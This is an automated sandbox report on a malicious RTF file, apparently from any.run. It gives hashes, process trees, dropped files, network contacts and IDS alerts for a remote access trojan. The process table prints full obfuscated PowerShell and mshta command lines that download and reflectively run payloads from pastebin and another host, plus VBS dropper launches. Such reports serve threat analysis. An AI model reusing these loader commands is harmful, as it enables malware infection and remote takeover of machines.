File name: | f3c5d8c75e64ddea1c6e446899910c76 |
Full analysis: | https://app.any.run/tasks/91cf4db7-3133-4176-b845-65467f5fffe3 |
Verdict: | Malicious activity |
Analysis date: | July 18, 2019, 03:05:21 |
OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
Indicators: | |
MIME: | text/rtf |
File info: | Rich Text Format data, version 1, unknown character set |
MD5: | F3C5D8C75E64DDEA1C6E446899910C76 |
SHA1: | 43EEAF9662FC56EEF8FDAD8E5C4745CD47D6E767 |
SHA256: | E053EF659D1F9988AA446EF54846A4783DB3C793BF86D94BE4673906C384502E |
SSDEEP: | 24576:gvWOvWAvWdvWDvWLvWGvWVvWnvWQvWbvW2vWFvWcvWcvWzvWEvWHvW5vW5vW6vWC:H |
.rtf | | | Rich Text Format (100) |
---|
Author: | Karla |
---|---|
LastModifiedBy: | Joselio Bonin |
CreateDate: | 2019:06:26 01:31:00 |
ModifyDate: | 2019:06:26 01:37:00 |
RevisionNumber: | 2 |
TotalEditTime: | 3 minutes |
Pages: | 1 |
Words: | 3 |
Characters: | 18 |
CharactersWithSpaces: | 20 |
InternalVersionNumber: | 105 |
PID | CMD | Path | Indicators | Parent process |
---|---|---|---|---|
3884 | "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\f3c5d8c75e64ddea1c6e446899910c76.rtf" | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | — | explorer.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Word Exit code: 1 Version: 14.0.6024.1000 | ||||
2560 | "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" -Embedding | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | svchost.exe | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Excel Exit code: 1 Version: 14.0.6024.1000 | ||||
3156 | "C:\Windows\System32\cmd.exe" /c ping 127.0.0.1 -n 6 > nul & start C:\Users\Public\OfficeWord.vbs | C:\Windows\System32\cmd.exe | — | EXCEL.EXE |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | ||||
1768 | "C:\Windows\System32\cmd.exe" /c ping 127.0.0.1 -n 7 > nul & start C:\Users\Public\Microsoft.vbs | C:\Windows\System32\cmd.exe | — | EXCEL.EXE |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | ||||
2176 | ping 127.0.0.1 -n 6 | C:\Windows\system32\PING.EXE | — | cmd.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: TCP/IP Ping Command Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
1736 | ping 127.0.0.1 -n 7 | C:\Windows\system32\PING.EXE | — | cmd.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: TCP/IP Ping Command Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
4076 | "C:\Windows\System32\WScript.exe" "C:\Users\Public\OfficeWord.vbs" | C:\Windows\System32\WScript.exe | — | cmd.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft ® Windows Based Script Host Exit code: 0 Version: 5.8.7600.16385 | ||||
3452 | "C:\Windows\System32\WScript.exe" "C:\Users\Public\Microsoft.vbs" | C:\Windows\System32\WScript.exe | — | cmd.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft ® Windows Based Script Host Exit code: 0 Version: 5.8.7600.16385 | ||||
2780 | "C:\Windows\System32\cmd.exe" /c ping 127.0.0.1 -n 10 > nul & mshta.exe vbscript:CreateObject("Wscript.Shell").Run("powershell.exe -noexit -command [Reflection.Assembly]::Load([System.Convert]::FromBase64String((New-Object Net.WebClient).DownloadString('h'+'t'+'t'+'p'+'s:'+'//p'+'a'+'s'+'t'+'e'+'b'+'i'+'n'+'.'+'c'+'o'+'m'+'/'+'r'+'a'+'w'+'/'+'e8GrYbHb'))).EntryPoint.Invoke($N,$N)",0,true)(window.close) | C:\Windows\System32\cmd.exe | — | WScript.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | ||||
3484 | "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit [Byte[]]$sc64= iex(iex('(&(GCM *W-O*)'+ 'Net.'+'WebC'+'lient)'+'.Dow'+'nload'+'Str'+'ing(''http://www.m9c.net/uploads/15615146751.jpg'').replace(''*'',''x0'')'));[<##>AppDomain<##>]::<##>('^urrentDomain'.replace('^','C'))<##>.<##>('%oad'.replace('%','L'))($sc64).'EntryPoint'<##>.<##>('in@okg'.replace('g','e').replace('@','v'))($null,$null) | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | — | WScript.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Version: 6.1.7600.16385 (win7_rtm.090713-1255) |
PID | Process | Filename | Type | |
---|---|---|---|---|
3884 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\CVRF81C.tmp.cvr | — | |
MD5:— | SHA256:— | |||
2560 | EXCEL.EXE | C:\Users\admin\AppData\Local\Temp\CVR2A.tmp.cvr | — | |
MD5:— | SHA256:— | |||
3484 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\JX3EEC1XRVUNLBWUWTRF.temp | — | |
MD5:— | SHA256:— | |||
2652 | EXCEL.EXE | C:\Users\admin\AppData\Local\Temp\CVR2527.tmp.cvr | — | |
MD5:— | SHA256:— | |||
2924 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\HP5SI8Y75Q06IOZCBERL.temp | — | |
MD5:— | SHA256:— | |||
2560 | EXCEL.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\JGRR2OYX\yvyE642L[1].txt | text | |
MD5:7F2A202549A7CE9E21FA866B234E6E1F | SHA256:81D128737CE4EC69BCAB76FFA039B80C84A1E8001DB603029DA878E766BD0E9D | |||
2560 | EXCEL.EXE | C:\Users\Public\OfficeWord.vbs | text | |
MD5:7F2A202549A7CE9E21FA866B234E6E1F | SHA256:81D128737CE4EC69BCAB76FFA039B80C84A1E8001DB603029DA878E766BD0E9D | |||
3484 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RFe2362.TMP | binary | |
MD5:E4D9C442DD447A8FA05F9CFE88FCBB69 | SHA256:EDD7D7597C6C79A1DFD3229A1FA23433329B1D8399EB558623FFF948D3BB4036 | |||
2560 | EXCEL.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\JGRR2OYX\qzduaLGZ[1].txt | text | |
MD5:E6896FCD01487D21DFEF7326A34AFF8E | SHA256:45E45D2932816B14665F65EE4FC1AA7473B29031DA1612D3D909F867C618D80E | |||
3884 | WINWORD.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotm | pgc | |
MD5:9C8E9F7DA8C5639E962201B54893874F | SHA256:ED894FB76B582682A53A8210F617C702B4B53BCFE10ACB9FD7AA09B96BA06E53 |
PID | Process | IP | Domain | ASN | CN | Reputation |
---|---|---|---|---|---|---|
2924 | powershell.exe | 152.246.81.100:80 | bylgay.hopto.org | TELEFÔNICA BRASIL S.A | BR | malicious |
2924 | powershell.exe | 104.20.208.21:443 | pastebin.com | Cloudflare Inc | US | shared |
2560 | EXCEL.EXE | 104.20.209.21:443 | pastebin.com | Cloudflare Inc | US | shared |
Domain | IP | Reputation |
---|---|---|
pastebin.com |
| shared |
bylgay.hopto.org |
| malicious |
PID | Process | Class | Message |
---|---|---|---|
2924 | powershell.exe | A Network Trojan was detected | MALWARE [PTsecurity] Revenge/hamza-RAT CnC Checkin |
2924 | powershell.exe | A Network Trojan was detected | MALWARE [PTsecurity] Revenge/hamza-RAT CnC Checkin |
2924 | powershell.exe | A Network Trojan was detected | MALWARE [PTsecurity] Revenge/hamza-RAT CnC Checkin |
2924 | powershell.exe | A Network Trojan was detected | MALWARE [PTsecurity] Revenge/hamza-RAT CnC Checkin |
2924 | powershell.exe | A Network Trojan was detected | MALWARE [PTsecurity] Revenge/hamza-RAT CnC Checkin |
2924 | powershell.exe | A Network Trojan was detected | MALWARE [PTsecurity] Revenge/hamza-RAT CnC Checkin |
2924 | powershell.exe | A Network Trojan was detected | MALWARE [PTsecurity] Revenge/hamza-RAT CnC Checkin |
2924 | powershell.exe | A Network Trojan was detected | MALWARE [PTsecurity] Revenge/hamza-RAT CnC Checkin |
2924 | powershell.exe | A Network Trojan was detected | MALWARE [PTsecurity] Revenge/hamza-RAT CnC Checkin |
2924 | powershell.exe | A Network Trojan was detected | MALWARE [PTsecurity] Revenge/hamza-RAT CnC Checkin |